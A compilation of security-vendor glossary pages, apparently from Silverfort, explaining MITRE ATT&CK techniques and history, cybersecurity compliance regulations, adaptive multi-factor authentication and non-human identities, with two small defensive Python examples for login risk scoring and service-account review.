- Disabling Security Tools (T1562): Actions taken to disable security software or services that could detect or prevent malicious activity.
- Credential Dumping (T1003): Extracting credentials from systems, often through tools like Mimikatz.
- Input Capture (T1056): Recording user input, including keylogging, to capture credentials and other sensitive information.
- System Information Discovery (T1082): Gathering information about the system to inform further actions, such as software versions and configurations.
- Account Discovery (T1087): Identifying accounts, often to understand privileges and roles within the environment.
- Remote Services (T1021): Using remote services such as Remote Desktop Protocol (RDP), Secure Shell (SSH), or others to move across systems.
- Pass the Ticket (T1097): Using stolen Kerberos tickets to authenticate as other users without the need for their plaintext password.
- Commonly Used Port (T1043): Using ports that are typically open for internet traffic to communicate with controlled systems, helping to blend in with legitimate traffic.
- Standard Application Layer Protocol (T1071): Using protocols such as HTTP, HTTPS, or DNS to facilitate command and control communications, making detection more challenging.
- Data Encrypted for Impact (T1486): Encrypting data to prevent its use and potentially leveraging it for ransom demands.
- Exfiltration Over Command and Control Channel (T1041): Sending stolen data over the same channel used for command and control to avoid additional network footprints.

These techniques represent just a sample of the extensive options adversaries have at their disposal. Effective cybersecurity practices require ongoing education and adaptation to address these and emerging techniques. By understanding and preparing for these common techniques, organizations can enhance their defensive posture and reduce the risk of successful cyber attacks.

#### Procedures

Procedures are the specific implementations of techniques by actual threat actors. They represent the real-world application of techniques, providing examples of how a specific adversary group might leverage a technique to achieve its objectives. This level of detail adds depth to the framework, illustrating the practical use of techniques in various contexts. Organizations can gain insight into the mode of operation of particular threat actors by studying procedures, enabling them to tailor their defenses accordingly.

The framework is further organized into matrices for different platforms, acknowledging the distinct nature of cyber threats across environments like Windows, macOS, Cloud, and others. This differentiation ensures that the framework's insights are relevant and actionable across a broad spectrum of IT infrastructures.
### Application in Real-World Scenarios

The practical application of the MITRE ATT&CK Framework in real-world scenarios underscores its value to cybersecurity and IT professionals. By providing a detailed understanding of adversary behaviors, the framework facilitates a proactive approach to security, enhancing an organization's capacity to anticipate, detect, and respond to cyber threats.

#### Enhancing Threat Intelligence

- Comprehensive Adversary Profiles: By aggregating and analyzing techniques associated with specific threat actors, the framework helps organizations develop detailed adversary profiles, offering insights into potential future attacks.
- Trend Analysis: The framework aids in identifying emerging trends in cyber threats, enabling security teams to adjust their defenses in anticipation of evolving tactics and techniques.

#### Strengthening Security Operations

- Security Posture Assessment: Organizations use the MITRE ATT&CK Framework to assess their security posture, identifying potential vulnerabilities in their defenses and prioritizing remediation efforts based on the techniques most relevant to their threat landscape.
- Threat Hunting: Security professionals leverage the framework to guide their threat hunting activities, using known tactics and techniques as indicators of compromise to uncover latent threats within their environments.

#### Informing Incident Response

- Accelerating Detection and Response: Incident response teams apply the framework to rapidly identify the tactics and techniques employed in an attack, facilitating a quicker and more targeted response to breaches.
- Post-Incident Analysis: Following an incident, the framework is used to dissect the attack chain, providing valuable lessons that can be used to fortify defenses against future attacks.
### History of the MITRE ATT&CK Framework

The genesis of the MITRE ATT&CK Framework traces back to 2013, marking the culmination of efforts by MITRE, a not-for-profit organization renowned for its dedication to solving critical public challenges through research and innovation. Originating as a project within MITRE to document the behavior of advanced persistent threats (APTs), the framework has since transcended its initial scope, evolving into a globally recognized encyclopedia of adversary tactics and techniques.

#### The Early Days

The inception of ATT&CK was driven by the need for a standardized language and methodology to describe and categorize the behavior of cyber adversaries. Prior to ATT&CK, the cybersecurity community lacked a unified framework for sharing information about how threats operated, making it challenging to build collective defenses against common adversaries. Recognizing this gap, MITRE set out to create a tool that would not only facilitate better understanding of threat behaviors but also foster collaboration within the cybersecurity community.

#### Expansion and Evolution

What started as a modest collection of techniques observed in APT campaigns rapidly expanded as contributions from cybersecurity professionals around the world began to enrich the framework. This collaborative effort led to the diversification of the framework, extending its applicability beyond APTs to encompass a wide range of cyber threats across various environments, including cloud, mobile, and network-based systems.

#### Key Milestones

- 2013: Launch of the ATT&CK Framework, initially focusing on Windows-based threats.
- 2015: Introduction of matrices for other platforms, such as macOS and Linux, reflecting the framework's growing inclusivity.
- 2017: Expansion to cover mobile threats, highlighting the evolving landscape of cybersecurity concerns.
- 2018: Release of the ATT&CK for Enterprise matrix, offering insights into adversary tactics and techniques across all major platforms.
- 2020 and Beyond: Continuous updates and the introduction of sub-techniques to provide even more granular insights into adversary behaviors.

The development of ATT&CK has been marked by an ongoing commitment to openness and community engagement. By soliciting feedback and contributions from cybersecurity practitioners worldwide, MITRE has ensured that the framework remains relevant, up-to-date, and reflective...

---

- Published: 2024-05-21
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/cyber-security-compliance/

Adherence to laws, regulations, and standards (e.g., HIPAA, GDPR, PCI DSS, SOX) governing how sensitive data must be handled and protected.

Cyber security compliance refers to following the set of rules and regulations regarding how organizations should handle and protect sensitive data. Compliance is important for any company that collects, processes or stores personally identifiable information (PII), protected health information (PHI), financial data or other sensitive information. Some of the major regulations that organizations must comply with include:

- The Health Insurance Portability and Accountability Act (HIPAA), which protects PHI. Healthcare organizations and their business associates must comply with HIPAA.
- The General Data Protection Regulation (GDPR), which protects the PII of individuals in the European Union. Any company that markets to or collects data from people in the EU must comply with GDPR.
- The Payment Card Industry Data Security Standard (PCI DSS), which applies to any organization that accepts credit card payments. They must comply to ensure customer payment data is protected.
- The Sarbanes-Oxley Act (SOX), which applies to publicly traded companies in the U.S. SOX compliance ensures accurate financial reporting and internal controls.

Complying with these and other cyber security standards is important to avoid potential legal issues and penalties.
Non-compliance can lead to hefty fines and damage to an organization's reputation. To achieve compliance, organizations must implement technical controls like data encryption, access management, and network security. They must also have appropriate policies and procedures in place, conduct risk assessments, and train employees on security best practices. Compliance frameworks like the NIST Cybersecurity Framework can help guide organizations in building a robust cyber security compliance program.

### Major Compliance Frameworks and Standards

There are several major regulatory requirements for cyber security compliance that organizations need to understand:

#### Payment Card Industry Data Security Standard (PCI DSS)

The PCI DSS applies to any organization that processes, stores or transmits credit card payments. It consists of 12 requirements related to building and maintaining a secure payment card data environment. Organizations must validate PCI DSS compliance annually through an assessment.

#### Health Insurance Portability and Accountability Act (HIPAA)

HIPAA establishes requirements for protecting sensitive patient health information. It applies to health plans, health care clearinghouses, and health care providers. HIPAA requires administrative, physical and technical safeguards to ensure the confidentiality, integrity and availability of electronic protected health information (ePHI).

#### General Data Protection Regulation (GDPR)

GDPR is a European Union regulation that protects the personal data of EU citizens. It applies to organizations that collect or process personal data of individuals in the EU, regardless of whether the organization is based in the EU. GDPR requires transparency, consent, data minimization, accuracy, storage limitation, integrity, confidentiality and accountability.

#### Sarbanes-Oxley Act (SOX)

SOX establishes requirements for financial reporting accuracy and reliability for publicly traded companies in the US.
Section 404 requires management to annually assess and report on the effectiveness of internal controls over financial reporting. SOX compliance aims to prevent accounting fraud and protect shareholders.

#### Other Frameworks

Additional cyber security standards include:

- NY-DFS Part 500: A regulation from the New York State Department of Financial Services (NYDFS) that sets cybersecurity requirements for financial institutions and services companies in New York. Implemented in March 2017, it aims to protect customer information and IT systems from cyber threats by mandating that covered entities assess their cybersecurity risk and implement a plan to mitigate those risks.
- PCI DSS 4.0: The Payment Card Industry Data Security Standard version 4.0 is the latest update to the security standard for organizations handling branded credit cards. It focuses on protecting cardholder data and ensuring secure payment environments, emphasizing continuous monitoring and adapting to new threats.
- NIS2 Directive: A proposed EU regulation to replace the existing NIS Directive, aiming to increase security requirements for digital services, expand critical sectors, and enforce stricter supervisory measures and information sharing among EU member states.
- Digital Operational Resilience Act: Part of the EU's strategy to strengthen cybersecurity in the financial sector, ensuring that all participants have safeguards in place to mitigate cyberattacks and other risks.
- MAS Cybersecurity: The Monetary Authority of Singapore's cybersecurity framework outlines guidelines for financial institutions in Singapore, emphasizing robust security measures, risk assessments, and cybersecurity governance.
- Essential Eight: Cybersecurity strategies recommended by the Australian Cyber Security Centre, providing baseline cyber defense strategies for organizations. It includes strategies such as application control, patching applications, and multi-factor authentication.
- UK Telecommunications Security Framework: Sets enhanced security requirements for UK telecommunications providers to strengthen the security and resilience of public telecommunication networks and services against disruptions and cyber threats.
- Cybersecurity Code of Practice for Critical Information Infrastructure 2.0: Designed to protect critical information infrastructure in various sectors, outlining best practices and standards for securing digital assets against cyber threats.
- UK Cyber Essentials and Cyber Essentials Plus: UK government-backed schemes to help organizations protect against common cyber attacks. Cyber Essentials focuses on basic cyber hygiene controls, while Cyber Essentials Plus involves higher assurance through independent testing of cyber security measures.

Staying up to date with the compliance standards relevant to an organization's industry and geography is crucial for cyber security professionals. Compliance violations can lead to legal penalties, financial loss, and damage to an organization's reputation. Proactively building a compliance program and validating compliance through audits and assessments is key to mitigating these risks.

### Responsibilities in Cyber Security Compliance

Compliance helps reduce risk, enforce security standards, and ensure the confidentiality, integrity, and availability of data and IT systems. The key responsibilities in cyber security compliance include:

- Conducting risk assessments to identify vulnerabilities, threats, and their potential impacts. Risk assessments examine an organization's sensitive data, critical systems, and security controls to determine the likelihood and severity of cyber threats. The results are used to prioritize risks and implement appropriate safeguards.
- Developing and enforcing security policies, standards, procedures, and controls.
  These cyber security frameworks establish rules around data protection, access management, security monitoring, incident response, and other areas. They must align with legal, regulatory, and contractual obligations. Continuously reviewing and updating policies and procedures is necessary to account for changes in technology, regulations, business operations, and the threat landscape.
- Monitoring networks, systems, and user activity for security events and compliance violations. Continuous monitoring helps quickly detect compromises, data breaches, unauthorized access, malware infections, and other issues. It requires using log analysis tools, security information and event management (SIEM) solutions, data loss prevention (DLP) systems, and other technologies to collect, analyze, and alert on security data.
- Responding to security incidents like data breaches, ransomware infections, insider threats, and advanced persistent threats (APTs) to minimize damage and restore normal operations. Incident response plans detail the steps for detecting, containing, eradicating, and recovering from cyber attacks. They specify roles and responsibilities, communication protocols, and procedures for forensic analysis, damage assessment, and remediation.
- Providing regular cyber security awareness and training for employees. Educating end users about security policies, safe computing practices, and the latest cyber threats is essential for compliance. Security awareness programs aim to change risky behaviors and make individuals vigilant and responsible in protecting the organization's data and systems.
- Conducting audits to evaluate compliance with cyber security standards and identify areas for improvement. Both internal and external audits are performed to examine security controls, review policies and procedures, check for vulnerabilities, and ensure legal and regulatory compliance.
  The audits result in reports with recommendations to remediate any gaps and strengthen the overall security posture.

### Steps for Achieving Compliance

Achieving cybersecurity compliance requires planning and diligence. Organizations should take a systematic approach to establishing and maintaining a compliance program. The following steps provide an overview of how to achieve compliance:

#### Develop a compliance policy

The first step is to establish an official policy that outlines the organization's commitment to cybersecurity compliance. This policy should define the scope of compliance activities, assign responsibilities, and gain executive approval. With leadership buy-in established, organizations can move on to assessing their compliance obligations.

#### Identify applicable regulations

Organizations must determine which industry regulations apply to their operations. Common regulations include HIPAA for healthcare, GDPR for data privacy, and PCI DSS for payment security. Organizations should regularly review new and updated regulations to ensure ongoing compliance.

#### Conduct a risk assessment

A risk assessment identifies cyber risks and vulnerabilities that could impact compliance. It provides the foundation for a compliance program by revealing where controls need to be implemented. Risk assessments should be performed periodically to account for changes in technology infrastructure and compliance requirements.

#### Implement controls and procedures

With risks identified, organizations can deploy appropriate controls and update procedures to safeguard systems and data, meeting key compliance mandates. Standard controls include access management, encryption, monitoring, and security awareness training. Procedures should be thoroughly documented, with records maintained to demonstrate compliance.

#### Monitor and audit compliance

Regular monitoring and auditing are required to maintain continuous compliance.
Monitoring tools can track controls, detect violations, and generate reports. Both internal and external audits should be conducted, with results analyzed to identify and remediate gaps. Compliance is an ongoing process that requires continuous improvement.

#### Train employees

People play a key role in compliance, so ongoing security awareness and compliance training for all employees is critical. Training should be required, with completion tracked to ensure all personnel understand their responsibilities. Compliance fundamentals and any recent changes to regulations or controls should be covered.

### Conclusion

Ensuring compliance with cyber security standards and regulations is a crucial responsibility for organizations today. As cyber threats become increasingly sophisticated, governments and industry groups have established guidelines to help protect sensitive data and critical infrastructure. Compliance may require ongoing assessments, audits, training, and adaptation to new laws and standards. While compliance does not necessarily equate to security, following regulatory guidance and frameworks helps establish a robust security posture, builds trust with customers and partners, and avoids the potential legal consequences of non-compliance.

---

- Published: 2024-05-21
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/adaptive-multi-factor-authentication/

A risk-based authentication system that evaluates login context using AI and machine learning, prompting for extra factors only when a request is deemed high-risk.

Adaptive multi-factor authentication (MFA) is an authentication method that uses a risk-based approach to apply additional authentication factors based on contextual data. Unlike traditional MFA, adaptive MFA evaluates each login attempt to determine the level of risk before requiring additional authentication factors.
Adaptive MFA solutions leverage machine learning algorithms and artificial intelligence to analyze numerous data points like user behavior, location, time of day, device type, and more. If the login appears risky based on the analyzed data, the user will be prompted for an additional authentication factor like a security code sent via SMS text message or a push notification to an authentication app. For logins that appear less risky, the user may not be prompted for an additional factor.

The goal of adaptive MFA is to improve the user experience by reducing authentication friction for low-risk logins while still providing strong security for high-risk logins. This data-driven approach assigns each login request a risk score based on its context and requires additional authentication only when that score shows it is truly needed, helping prevent unauthorized access. Adaptive MFA allows organizations to implement MFA in a way that balances security and usability. By leveraging adaptive MFA, organizations can implement strong authentication for all user logins without negatively impacting the user experience. Adaptive MFA solutions provide robust protection against account takeover attacks while delivering a seamless login experience for legitimate users.

### How Adaptive MFA Works

Adaptive Multi-Factor Authentication (MFA) is an advanced approach to MFA that uses context-based access control. It goes beyond just verifying a user's identity by also analyzing additional factors about the login attempt. Adaptive MFA evaluates multiple factors, including:

- Geo-location: The physical location of the login attempt is analyzed to determine normal access patterns and detect anomalies. For example, if a user usually logs in from New York but there is suddenly a login from Russia, it may be flagged as suspicious.
- Device profiling: The device type, operating system, browser, and other attributes are checked to build a profile of the devices a user normally uses to access the application. Unrecognized devices are viewed as higher risk.
- Behavioral profiling: The user's typical behavior, typing speed, mouse movements, and other patterns are learned by the system over time. Deviations from the established baseline behavior can indicate account takeover.
- Business rules: Organization-specific business rules and policies are incorporated into the risk analysis. For example, access to sensitive data may be restricted based on job function or time of day.

By combining multiple factors, Adaptive MFA is able to make smarter authentication decisions based on the overall risk assessment. This may result in step-up authentication for suspicious logins, while low-risk logins proceed without additional verification. The end result is reduced friction for users and enhanced security for the organization.

### The Benefits of Using Adaptive MFA

Adaptive Multi-Factor Authentication (MFA) provides several key benefits for organizations.

#### Improved security and reduced risk of information breaches

Adaptive MFA helps prevent unauthorized access by requiring multiple methods to verify users' identities, such as passwords, security keys, and biometrics. By combining multiple factors, the solution creates an additional layer of security that is more difficult for cybercriminals to breach. This multi-layered approach significantly reduces the risks of data breaches, account takeovers, and other cyber threats.

#### Enhanced user experience and seamless access for legitimate users

Adaptive MFA solutions use machine learning and risk-based algorithms to analyze user login details and behaviors to determine normal or suspicious activity. The solution learns users' habits and can prompt for stronger authentication only when anomalies are detected.
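The factor-based scoring described under How Adaptive MFA Works, and the step-up-only-on-anomaly behavior just described, can be sketched as a small risk engine. The block below is an added example, not Silverfort's product code: the weights, thresholds, business rules, user baselines and login attempts are all constructed for illustration, and the baseline is updated only from logins that fully authenticated.

```python
from dataclasses import dataclass, field

# Constructed weights: how much each anomaly adds to the risk score.
WEIGHTS = {"geo": 40, "device": 30, "behavior": 15, "sensitive_resource": 25}
STEP_UP_AT = 30   # constructed threshold: prompt for a second factor
DENY_AT = 80      # constructed threshold: block the login and alert
# Constructed business rules: resources that always add risk, and roles that
# must always present a second factor regardless of score.
SENSITIVE_RESOURCES = {"payroll-db", "ad-admin-console"}
ALWAYS_STEP_UP_ROLES = {"admin", "executive"}


@dataclass
class Baseline:
    """What the engine has learned about one user's normal logins."""
    countries: set = field(default_factory=set)
    devices: set = field(default_factory=set)
    hours: set = field(default_factory=set)  # hours of day (0-23) seen before


@dataclass(frozen=True)
class LoginAttempt:
    user: str
    role: str
    country: str
    device_id: str
    hour: int
    resource: str


def score_login(attempt, baseline):
    """Return (risk score, reasons) for one attempt against the user's baseline."""
    score, reasons = 0, []
    if attempt.country not in baseline.countries:      # geo-location
        score += WEIGHTS["geo"]
        reasons.append(f"login from unusual country {attempt.country}")
    if attempt.device_id not in baseline.devices:      # device profiling
        score += WEIGHTS["device"]
        reasons.append(f"unrecognized device {attempt.device_id}")
    if attempt.hour not in baseline.hours:             # behavioral profiling
        score += WEIGHTS["behavior"]
        reasons.append(f"login at unusual hour {attempt.hour:02d}:00")
    if attempt.resource in SENSITIVE_RESOURCES:        # business rule
        score += WEIGHTS["sensitive_resource"]
        reasons.append(f"access to sensitive resource {attempt.resource}")
    return score, reasons


def decide(attempt, baseline):
    """Map the score to 'allow', 'step_up' or 'deny'; returns (decision, score, reasons)."""
    score, reasons = score_login(attempt, baseline)
    if score >= DENY_AT:
        return "deny", score, reasons
    if attempt.role in ALWAYS_STEP_UP_ROLES:           # role-based business rule
        reasons.append(f"role {attempt.role} always requires a second factor")
        return "step_up", score, reasons
    if score >= STEP_UP_AT:
        return "step_up", score, reasons
    return "allow", score, reasons


def record_success(attempt, baseline):
    """Learn from a login that fully authenticated (including a passed step-up).

    Denied attempts never reach this function, so a denied context does not
    become part of the user's "normal" baseline.
    """
    baseline.countries.add(attempt.country)
    baseline.devices.add(attempt.device_id)
    baseline.hours.add(attempt.hour)


def demo():
    """Run constructed logins through the engine; returns [(label, decision)]."""
    baselines = {  # constructed baselines, as if learned over time
        "alice": Baseline({"US"}, {"laptop-a1"}, set(range(8, 19))),
        "bob": Baseline({"US"}, {"laptop-b7"}, set(range(7, 18))),
    }
    attempts = [
        ("alice usual login", LoginAttempt("alice", "employee", "US", "laptop-a1", 10, "crm")),
        ("alice new country, new device, 03:00", LoginAttempt("alice", "employee", "RU", "tablet-x", 3, "crm")),
        ("alice from new country only", LoginAttempt("alice", "employee", "RU", "laptop-a1", 10, "crm")),
        ("bob (admin) to AD console", LoginAttempt("bob", "admin", "US", "laptop-b7", 9, "ad-admin-console")),
    ]
    results = []
    for label, attempt in attempts:
        decision, score, reasons = decide(attempt, baselines[attempt.user])
        results.append((label, decision))
        if decision == "step_up":  # the demo assumes the second factor succeeded
            record_success(attempt, baselines[attempt.user])
    # Alice completed step-up from RU on laptop-a1, so that context is now routine.
    decision, _, _ = decide(attempts[2][1], baselines["alice"])
    results.append(("alice from RU again after step-up", decision))
    return results


if __name__ == "__main__":
    for label, decision in demo():
        print(f"{label:40s} -> {decision}")
```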
This risk-based approach helps provide a balance of security and convenience for users by reducing the frequency of step-up authentication for legitimate users with normal login patterns. Users can enjoy fast, seamless access the majority of the time.

#### Support for Single Sign-On (SSO) and workplace flexibility

Adaptive MFA solutions typically integrate with common SSO and Identity and Access Management (IAM) solutions, allowing users to access multiple applications and systems with one set of login credentials. Adaptive MFA also supports today's flexible work environments by enabling secure authentication from any location. Users can authenticate using methods like push notifications to their mobile devices, SMS codes, security keys, and biometrics.

### Are Adaptive MFA and Risk-Based Authentication the same thing?

Adaptive Multi-Factor Authentication and Risk-Based Authentication are closely related concepts in the realm of cybersecurity, but they are not exactly the same. While both Adaptive MFA and Risk-Based Authentication involve analyzing risk factors to provide appropriate security measures, Adaptive MFA is more focused on the authentication process itself, adapting the required authentication factors based on the evaluated risk. On the other hand, RBA takes a broader approach, assessing the risk of specific actions or transactions beyond just the login process. Adaptive MFA can be seen as a subset or a specific application of the broader RBA approach.

### Implementing Adaptive MFA

Implementing Adaptive Multi-Factor Authentication (MFA) within an organization requires significant planning and resources to be effective. There are several steps organizations should take:

#### Conduct a risk assessment

An organization must first evaluate its security risks and requirements. It should determine what data and systems need enhanced protection and map those to appropriate MFA methods. More sensitive data may require stronger factors like biometrics while less sensitive systems may only need SMS authentication. An assessment will guide an organization in choosing the right MFA types and deployment strategies.

#### Choose MFA types

There are various MFA options including SMS codes, security keys, biometrics, push notifications, and OTP apps. An organization should select MFA methods that balance security and user experience. More secure options like biometrics may be better for high-risk systems while push notifications could suffice for low-risk ones. Providing multiple MFA options allows users to choose their preferred method.

#### Develop policies and procedures

Organizations need to establish comprehensive policies around MFA including enrollment, usage, and exception handling processes. Procedures should be documented to ensure consistent and effective implementation. Policies should also specify consequences for non-compliance to maximize adoption.

#### Conduct user training

Training and education are critical to gaining user acceptance of MFA. Users should understand why MFA is important, how the selected methods work, and any policies that apply. Hands-on demonstrations and practice opportunities will make the transition to MFA smoother. Ongoing communications about MFA best practices will help sustain adoption.

#### Monitor and manage the program

MFA programs require continuous monitoring and management. Organizations must track key metrics around usage, security events, and user experience to make improvements. They need to stay up-to-date with advancements in MFA technologies and adjust their programs accordingly. Proactive management of an MFA program will help maximize both security and user satisfaction over the long run.

### Role-Based Adaptive Authentication and Behavioral Analytics

Role-based adaptive authentication implements different authentication requirements depending on a user's position and level of access. Executives and administrators typically have access to sensitive data and systems, so they may require hard tokens or biometrics in addition to passwords for most logins. Regular employees with more limited access may only need single-factor authentication, like a password, for routine logins. However, if a standard employee attempts to access an executive's account or sensitive data, the system can prompt for additional authentication factors.

Behavioral analytics monitors user activity and login patterns to detect anomalies that could indicate account compromise or fraud. Things like logging in from an unusual location or device, attempting access during non-working hours, frequent password resets, or other abnormal behaviors may trigger the system to prompt for additional authentication factors to verify the user's identity. The specific factors required may also depend on the user's role. Over time, the system learns a user's normal activity patterns and can fine-tune when and what types of multi-factor authentication to apply.

Adaptive MFA and behavioral analytics work together to apply the appropriate level of authentication based on each user's normal activity and access levels. By using role-based factors and learning over time, the system can improve security where it's needed most while maintaining usability and productivity. The result is a flexible, intelligent access management solution.

### Conclusion

By requiring multiple methods to verify a user's identity and dynamically adjusting the factors based on risk, adaptive MFA solutions can help close security gaps and reduce fraud. While not a silver bullet, adaptive MFA makes unauthorized account access significantly more difficult and time-consuming for attackers. For cybersecurity and IT professionals looking to balance security and user experience, adaptive MFA may be an approach worth exploring.
With data breaches on the rise, using multiple factors that change based on context is an effective strategy to verify identity and help safeguard access.

---

- Published: 2024-05-16
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/non-human-identity/

Digital identities assigned to systems, bots, or services rather than people—like service accounts or automated agents—that require management and protection just like human identities.

Non-human identities (NHIs) are digital entities used to represent machines, applications, and automated processes within an IT infrastructure. Unlike human identities, which are tied to individual users, NHIs facilitate machine-to-machine interactions and perform repetitive tasks without human intervention. These machine identities are critical in both cloud-native and on-premises environments, where they help manage and automate complex workflows.

Examples of NHIs include API keys, OAuth tokens, service accounts, and system accounts. Each type of NHI serves a different purpose. API keys allow different software applications to communicate securely, while OAuth tokens enable authentication and authorization processes in web services. Service accounts are dedicated accounts in Active Directory used by applications to interact with other systems, performing tasks such as data backups and system monitoring.

NHIs play a pivotal role in ensuring seamless operations in digital environments. They enable continuous integration and delivery (CI/CD) pipelines, manage cloud services, and integrate disparate applications, thereby enhancing operational efficiency and automation. Because of their widespread use, they pose significant security challenges, necessitating robust management and protection measures to prevent unauthorized access.

### Human vs. Non-Human Identities

The primary distinction between human and non-human identities lies in their nature and the security protocols governing them. Human identities are associated with individual users who interact with systems and applications, typically requiring multi-factor authentication (MFA) and regular password changes. Non-human identities (NHIs), on the other hand, represent applications, services, and automated processes, often operating without direct human oversight.

#### Key Differences in Security Protocols and Oversight

Human identities are managed and protected with well-defined security practices, including strong authentication methods, role-based access controls, and regular monitoring of user activities. These identities are often subject to extensive monitoring to ensure compliance with security policies and regulatory requirements. Conversely, NHIs are created to perform specific tasks and functions, such as automated backups or API communications, and are not directly monitored by individuals. As a result, they may not be subject to the same level of scrutiny, making them potential targets for exploitation.

#### Challenges in Managing and Securing NHIs vs Human Identities

Managing and securing NHIs presents unique challenges. Unlike human users, NHIs do not have the ability to respond to MFA prompts or change passwords regularly. This can lead to practices where passwords or tokens are hardcoded into scripts or applications, making them difficult to rotate or update. Additionally, NHIs often have elevated privileges to perform their tasks, increasing the risk if their credentials are compromised.

Another significant challenge is the sheer volume and variety of NHIs within an organization. With the rise of cloud computing, microservices, and automated workflows, the number of NHIs has grown exponentially. This proliferation makes it difficult for security teams to maintain visibility and control over all NHIs, especially those created without proper documentation or oversight.
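The management gaps just described (static credentials that are rarely rotated, elevated privileges, and a volume of accounts that escapes documentation) can be checked mechanically against an NHI inventory. The block below is an added example, not Silverfort's product code; the inventory, the rotation and dormancy thresholds and the privileged-group names are constructed for illustration.

```python
from dataclasses import dataclass
from datetime import date
from typing import Dict, FrozenSet, List, Optional, Tuple

REVIEW_DATE = date(2025, 8, 21)   # constructed "today" for the review
MAX_CREDENTIAL_AGE_DAYS = 365     # constructed policy: rotate secrets at least yearly
DORMANT_AFTER_DAYS = 90           # constructed policy: unused this long -> decommission review
# Constructed set of directory groups treated as privileged in this demo.
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Backup Operators"}

Finding = Tuple[str, str]         # (severity, message)


@dataclass(frozen=True)
class NHI:
    name: str
    kind: str                     # "service_account", "api_key", "oauth_token"
    owner: Optional[str]          # documented owning team, or None if nobody claims it
    credential_rotated: date      # when the password/key/token was last changed
    last_used: Optional[date]     # last observed authentication, None if never seen
    groups: FrozenSet[str]        # directory or cloud groups granting privileges


def review(nhi: NHI, today: date = REVIEW_DATE) -> List[Finding]:
    """Apply the credential, lifecycle, privilege and ownership checks to one identity."""
    findings: List[Finding] = []
    cred_age = (today - nhi.credential_rotated).days
    if cred_age > MAX_CREDENTIAL_AGE_DAYS:
        # A static secret that is never rotated stays valid for as long as it leaks.
        findings.append(("high", f"credential not rotated for {cred_age} days"))
    if nhi.last_used is None:
        findings.append(("medium", "never observed authenticating; confirm purpose or disable"))
    else:
        idle = (today - nhi.last_used).days
        if idle > DORMANT_AFTER_DAYS:
            findings.append(("medium", f"dormant for {idle} days; decommission candidate"))
    privileged = sorted(nhi.groups & PRIVILEGED_GROUPS)
    if privileged:
        findings.append(("high", f"member of privileged groups {privileged}; verify least privilege"))
    if not nhi.owner:
        findings.append(("medium", "no documented owner"))
    return findings


def review_inventory(inventory: List[NHI], today: date = REVIEW_DATE) -> Dict[str, List[Finding]]:
    """Return {identity name: findings} for the whole inventory."""
    return {nhi.name: review(nhi, today) for nhi in inventory}


def prioritize(report: Dict[str, List[Finding]]) -> List[str]:
    """Order identities for remediation: most high-severity findings first, then most findings."""
    def key(item):
        name, findings = item
        highs = sum(1 for severity, _ in findings if severity == "high")
        return (-highs, -len(findings), name)
    return [name for name, _ in sorted(report.items(), key=key)]


# Constructed inventory; names, dates and group memberships are illustrative only.
INVENTORY = [
    NHI("svc-backup", "service_account", "infra-team", date(2019, 1, 10), date(2025, 8, 20),
        frozenset({"Backup Operators"})),
    NHI("svc-legacy-report", "service_account", None, date(2021, 5, 5), date(2024, 11, 1), frozenset()),
    NHI("svc-sql-prod", "service_account", "dba-team", date(2025, 3, 1), date(2025, 8, 21),
        frozenset({"Domain Admins"})),
    NHI("svc-orphan", "oauth_token", None, date(2024, 12, 1), None, frozenset()),
    NHI("ci-deploy-key", "api_key", "platform-team", date(2025, 6, 1), date(2025, 8, 21), frozenset()),
]


if __name__ == "__main__":
    report = review_inventory(INVENTORY)
    for name in prioritize(report):
        print(name)
        for severity, message in report[name]:
            print(f"  [{severity}] {message}")
```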
| Aspect | Human Identities | Non-Human Identities |
| --- | --- | --- |
| Authentication and Access Control | Typically involves MFA, enhancing security through multi-layered approaches. | Cannot use traditional MFA. Authentication relies on static credentials like API keys or service account passwords. |
| Visibility and Monitoring | User activities are regularly monitored through behavior analytics and SIEM systems. | NHIs are harder to monitor due to continuous operation and high volume, leading to longer periods of unnoticed unauthorized actions. |
| Lifecycle Management | Managed through IAM solutions, ensuring appropriate access via provisioning, de-provisioning, and access reviews. | Often lack comprehensive lifecycle management, leading to stale or overly permissive credentials. |
| Privilege Management | RBAC and least privilege principles ensure minimal necessary permissions. | Frequently have elevated privileges, making them attractive targets. Ensuring least privilege is complex due to varied functions. |
| Documentation and Oversight | Typically well-documented with clear processes for onboarding and offboarding. | Often lack proper documentation, especially in dynamic environments, increasing the difficulty of effective management and security. |

### Examples and Use Cases for NHIs

Below are some key use cases and examples that highlight the importance and functionality of NHIs across various platforms.

- Integrating Applications: OAuth tokens enable seamless integration between applications, allowing them to share data and functionality securely. For instance, a marketing platform might use OAuth tokens to integrate with CRM systems, automating data synchronization.
- Automating Workflows: Robotic Process Automation (RPA) relies heavily on NHIs to perform tasks that mimic human actions, such as processing transactions, manipulating data, and communicating with other digital systems.
Managing Cloud Services: NHIs, like service accounts in cloud environments, manage various cloud services, including provisioning resources, scaling applications, and monitoring performance. This ensures efficient and scalable cloud operations. CI/CD Pipelines: Service accounts within CI/CD tools like Jenkins or GitLab automate the build, test, and deployment processes, ensuring rapid and consistent delivery of software updates. Service Accounts within Active Directory: In an Active Directory environment, service accounts are used to run essential services like database management systems, web servers, and other critical applications. These accounts need to be carefully managed and monitored to prevent unauthorized access and potential security incidents. These examples illustrate the diverse use cases of NHIs and their significance in enhancing operational efficiency. However, the increased reliance on NHIs also underscores the need for robust security measures to mitigate the associated risks. Security Risks and Challenges of NHIs Non-human identities (NHIs) introduce a unique set of security risks and challenges that can compromise the integrity of IT environments if not properly managed. Understanding these risks is crucial for developing effective security strategies. Lack of Visibility, Monitoring, and Governance One of the most significant risks associated with NHIs is the lack of visibility. Organizations often have difficulty maintaining an accurate inventory of NHIs, resulting in blind spots in their security posture. Unless properly monitored and governed, NHIs can easily be overlooked, making them prime targets for attackers. Risk of Compromised Credentials It is common for NHIs to use static credentials, such as API keys and service account passwords, which can be stolen or leaked. Compromised credentials can lead to unauthorized access and data breaches. 
A notable example is the Cloudflare breach, where API keys were exploited to gain unauthorized access to sensitive information.

#### Potential for Lateral Movement within Networks

Attackers can utilize compromised NHIs to move laterally within a network, escalating their privileges and accessing sensitive systems and data. This lateral movement is facilitated by the high privileges assigned to NHIs, which are necessary for them to perform their intended functions. Once inside the network, attackers are able to exploit these privileges to achieve their malicious goals.

#### Lack of Service Account Visibility

